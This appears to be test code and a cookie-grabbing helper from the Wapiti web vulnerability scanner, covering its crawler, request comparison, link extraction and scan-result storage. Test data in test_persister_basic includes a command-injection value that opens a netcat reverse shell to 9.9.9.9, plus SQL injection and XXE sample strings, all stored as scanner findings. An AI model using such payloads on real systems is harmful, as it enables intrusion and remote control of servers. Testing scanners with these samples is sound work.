def test_timeout():
    url = "http://127.0.0.1:65080/timeout.php"

    crawler = Crawler(url, timeout=1)
    request = Request(url)
    with pytest.raises(ReadTimeout):
        crawler.send(request)
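# The test above expects a slow endpoint listening on 127.0.0.1:65080 that takes
# longer than the crawler's one-second timeout to answer; that server is not part
# of this file. A minimal stand-in (a sketch using only the standard library; the
# handler name below is made up for illustration) could look like this:

import time
from http.server import BaseHTTPRequestHandler, HTTPServer


class SlowHandler(BaseHTTPRequestHandler):
    """Answer every GET only after a delay longer than the crawler timeout."""

    def do_GET(self):
        time.sleep(3)  # exceed the timeout=1 used by the Crawler in test_timeout()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"too late")


if __name__ == "__main__":
    # 65080 is the port hard-coded in test_timeout()
    HTTPServer(("127.0.0.1", 65080), SlowHandler).serve_forever()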
@responses.activate
def test_persister_upload():
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["file1", ["'fname1", "content"]], ["file2", ["fname2", "content"]]]
    )

    xml_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>Hello there</xml>"]]]
    )

    persister.add_request(simple_upload)
    persister.add_request(xml_upload)
    assert persister.count_paths() == 2

    stored_requests = set(persister.get_to_browse())
    assert simple_upload in stored_requests
    assert xml_upload in stored_requests

    responses.add(
        responses.POST,
        "http://httpbin.org/post?qs1",
        body="Hello there"
    )

    crawler = Crawler("http://httpbin.org/")

    for req in stored_requests:
        crawler.send(req)
        persister.add_request(req)

        if req == simple_upload:
            assert req.file_params == simple_upload.file_params
            assert req.file_params[0] == ["file1", ["'fname1", "content"]]
            assert req.file_params[1] == ["file2", ["fname2", "content"]]
        else:
            assert req.file_params == xml_upload.file_params
            assert req.file_params[0] == ["calendar", ["calendar.xml", "<xml>Hello there</xml>"]]

    naughty_file = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>XXE there</xml>"]]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>")
    payload = next(persister.get_payloads())
    assert naughty_file == payload.evil_request
    assert payload.parameter == "calendar"

    assert len(list(persister.get_forms(path="http://httpbin.org/post"))) == 2
@responses.activate
def test_explorer_extract_links():
    crawler = Crawler("http://perdu.com/")
    explorer = Explorer(crawler)
    responses.add(
        responses.GET,
        "http://perdu.com/",
        body="""<html><body>
        <a href="http://perdu.com/index.html"></a>
        <a href="https://perdu.com/secure_index.html"></a>
        <a href="//perdu.com/protocol_relative.html"></a>
        <a href="//lol.com/protocol_relative.html"></a>
        <a href="http://perdu.com:8000/other_port.html"></a>
        <a href="http://microsoft.com/other_domain.html"></a>
        <a href="welcome.html"></a>
        <a href="/about.html"></a>
        <form method="POST" action="http://perdu.com/valid_form.html">
        <input name="field" type="hidden" value="hello"/></form>
        <form method="POST" action="http://external.com/external_form.html">
        <input name="field" type="hidden" value="hello"/></form>
        """
    )

    request = Request("http://perdu.com/")
    page = crawler.send(request)

    results = list(explorer.extract_links(page, request))
    # We should get 6 resources as the path from the form will also be used as a URL
    assert len(results) == 6
@responses.activate
def test_redirect():
    slyfx = "http://www.slyfx.com/"
    disney = "http://www.disney.com/"

    responses.add(responses.GET, slyfx, body="Back to disneyland", status=301, headers={"Location": disney})
    responses.add(responses.GET, disney, body="Hello there")

    crawler = Crawler(slyfx)

    page = crawler.send(Request(slyfx))
    assert page.url == slyfx
    assert not page.history

    page = crawler.send(Request(slyfx), follow_redirects=True)
    assert page.url == disney
    assert page.history[0].url == slyfx
def getcookie_main():
    parser = argparse.ArgumentParser(description="Wapiti-getcookie: A utility to grab cookies from a webpage")
    parser.add_argument(
        '-u', '--url',
        help='First page to fetch for cookies',
        required=True
    )

    parser.add_argument(
        '-c', '--cookie',
        help='Cookie file in Wapiti JSON format where cookies will be stored',
        required=True
    )

    parser.add_argument(
        '-p', '--proxy',
        help='Address of the proxy server to use'
    )

    parser.add_argument(
        "--tor",
        action="store_true",
        help=_("Use Tor listener (127.0.0.1:9050)")
    )

    parser.add_argument(
        "-a", "--auth-cred",
        dest="credentials",
        default=argparse.SUPPRESS,
        help=_("Set HTTP authentication credentials"),
        metavar="CREDENTIALS"
    )

    parser.add_argument(
        "--auth-type",
        default=argparse.SUPPRESS,
        help=_("Set the authentication type to use"),
        choices=["basic", "digest", "kerberos", "ntlm"]
    )

    parser.add_argument(
        '-d', '--data',
        help='Data to send to the form with POST'
    )

    parser.add_argument(
        "-A", "--user-agent",
        default=argparse.SUPPRESS,
        help=_("Set a custom user-agent to use for every request"),
        metavar="AGENT",
        dest="user_agent"
    )

    parser.add_argument(
        "-H", "--header",
        action="append",
        default=[],
        help=_("Set a custom header to use for every request"),
        metavar="HEADER",
        dest="headers"
    )

    args = parser.parse_args()

    parts = urlparse(args.url)
    if not parts.scheme or not parts.netloc or not parts.path:
        print(_("Invalid base URL was specified, please give a complete URL with protocol scheme"
                " and slash after the domain name."))
        sys.exit()

    server = parts.netloc
    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))

    crawler = Crawler(base)

    if args.proxy:
        proxy_parts = urlparse(args.proxy)
        if proxy_parts.scheme and proxy_parts.netloc:
            if proxy_parts.scheme.lower() in ("http", "https", "socks"):
                crawler.set_proxy(args.proxy)

    if args.tor:
        crawler.set_proxy("socks://127.0.0.1:9050/")

    if "user_agent" in args:
        crawler.add_custom_header("user-agent", args.user_agent)

    if "credentials" in args:
        if "%" in args.credentials:
            crawler.credentials = args.credentials.split("%", 1)
        else:
            raise InvalidOptionValue("-a", args.credentials)

    if "auth_type" in args:
        crawler.auth_method = args.auth_type

    for custom_header in args.headers:
        if ":" in custom_header:
            hdr_name, hdr_value = custom_header.split(":", 1)
            crawler.add_custom_header(hdr_name.strip(), hdr_value.strip())

    # Open or create the cookie file and delete previous cookies from this server
    json_cookie = jsoncookie.JsonCookie()
    json_cookie.open(args.cookie)
    json_cookie.delete(server)

    # A first crawl is sometimes necessary, so let's fetch the webpage
    page = crawler.get(Request(args.url), follow_redirects=True)
    json_cookie.addcookies(crawler.session_cookies)

    if not args.data:
        # No data specified, try interactive mode by fetching forms
        forms = []
        for i, form in enumerate(page.iter_forms(autofill=False)):
            if i == 0:
                print('')
                print(_("Choose the form you want to use or enter 'q' to leave :"))
            print("{0}) {1}".format(i, form))
            forms.append(form)

        valid_choice_done = False
        if forms:
            nchoice = -1
            print('')
            while not valid_choice_done:
                choice = input(_("Enter a number : "))
                if choice.isdigit():
                    nchoice = int(choice)
                    if len(forms) > nchoice >= 0:
                        valid_choice_done = True
                elif choice == 'q':
                    break

        if valid_choice_done:
            form = forms[nchoice]
            print('')
            print(_("Please enter values for the following form: "))
            print(_("url = {0}").format(form.url))

            post_params = form.post_params
            for i, post_param_tuple in enumerate(post_params):
                field, value = post_param_tuple
                if value:
                    new_value = input(field + " (" + value + ") : ")
                else:
                    new_value = input("{}: ".format(field))
                post_params[i] = [field, new_value]

            request = Request(form.url, post_params=post_params)
            crawler.send(request, follow_redirects=True)
            json_cookie.addcookies(crawler.session_cookies)
    else:
        request = Request(args.url, post_params=args.data)
        crawler.send(request, follow_redirects=True)
        json_cookie.addcookies(crawler.session_cookies)

    json_cookie.dump()
    json_cookie.close()
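# Example invocation (a sketch: the command name assumes the script is installed
# as "wapiti-getcookie"; the target URL and form data below are placeholders):
#
#   wapiti-getcookie -u "http://target.example/login.php" -c cookies.json \
#       -d "username=admin&password=admin" -H "X-Requested-With: XMLHttpRequest"
#
# Without -d, the script lists the forms found on the fetched page and prompts for
# the fields of the one you pick; the resulting session cookies are written to the
# JSON file given with -c.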
@responses.activate
def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    responses.add(responses.GET, url, body="Hello world!")

    crawler = Crawler("http://httpbin.org/")

    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")
    simple_post = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", "d"]])
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If some requests are stored, it means the scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            crawler.send(req)
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links()))
    assert persister.count_paths() == 3

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass")
    assert next(persister.get_payloads())

    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))

    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"
def test_request_object():
    res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']])
    res3 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']])
    res4 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res5 = Request("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res6 = Request("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']])
    res8 = Request("http://httpbin.org/post?var2=d&var1=z", post_params=[['post1', 'c'], ['post2', 'd']])
    res10 = Request("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']])
    res11 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']])
    res12 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]]
    )
    res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos")
    res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/")
    res15 = Request("https://duckduckgo.com/")
    res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']])
    res17 = Request("http://example.com:8080/dir/?x=3")
    res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']])

    assert res1 < res2
    assert res2 > res3
    assert res1 < res3
    assert res1 == res4
    assert hash(res1) == hash(res4)

    res4.link_depth = 5
    assert hash(res1) == hash(res4)

    assert res1 != res2
    assert res2 >= res1
    assert res1 <= res3

    assert res13.file_name == "videos"
    assert res10.path == "http://httpbin.org/post"
    assert res10.file_name == "post"

    # This one is important as it could break attacks on query string
    assert res10.url == "http://httpbin.org/post?qs0"

    assert res13.parent_dir == res14.url
    assert res15.is_root
    assert res15.parent_dir == res15.url
    assert res13.dir_name == res14.url
    assert res14.dir_name == res14.url
    assert res15.dir_name == res15.url
    assert res15 != res16

    query_list = [res15]
    assert res16 not in query_list

    assert res17.dir_name == "http://example.com:8080/dir/"
    assert res18.url == "http://httpbin.org/get?get1=c&get2=d"
    assert res17.hostname == "example.com:8080"
    assert res1.encoded_get_keys == res8.encoded_get_keys
    assert res17.encoded_get_keys == "x"
    assert res16.encoded_get_keys == ""
    assert len(res12) == 5
    assert res12.encoded_get_keys == "qs1"
    assert res5.hash_params == res8.hash_params
    assert res7.hash_params != res8.hash_params

    print("Tests were successful, now launching representations")
    print("=== Basic representation follows ===")
    print(res1)
    print("=== cURL representation follows ===")
    print(res1.curl_repr)
    print("=== HTTP representation follows ===")
    print(res1.http_repr())
    print("=== POST parameters as an array ===")
    print(res1.post_params)
    print("=== POST keys encoded as string ===")
    print(res1.encoded_post_keys)
    print("=== Upload HTTP representation ===")
    print(res12.http_repr())
    print("=== Upload basic representation ===")
    print(res12)
    print("=== Upload cURL representation ===")
    print(res12.curl_repr)
    print("=== HTTP GET keys as a tuple ===")
    print(res1.get_keys)
    print("=== HTTP POST keys as a tuple ===")
    print(res1.post_keys)
    print("=== HTTP files keys as a tuple ===")
    print(res12.file_keys)
    print('')

    json_req = Request(
        "http://httpbin.org/post?a=b",
        post_params=json.dumps({"z": 1, "a": 2}),
        enctype="application/json"
    )
    crawler = Crawler("http://httpbin.org/")
    page = crawler.send(json_req)
    assert page.json["json"] == {"z": 1, "a": 2}
    assert page.json["headers"]["Content-Type"] == "application/json"
    assert page.json["form"] == {}

    page = crawler.send(res12)
    assert page.json["files"]

    res19 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]],
        enctype="multipart/form-data"
    )
    page = crawler.send(res19)
    assert page.json["files"]